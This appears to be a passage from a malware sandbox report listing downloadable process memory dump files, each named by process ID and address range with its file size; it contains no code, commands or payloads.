Download
memory/2028-119-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2028-122-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2028-112-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2028-98-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2960-103-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2960-121-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2960-95-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2960-97-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4684-36-0x000001ECEF850000-0x000001ECEF872000-memory.dmp

Filesize
136KB

Download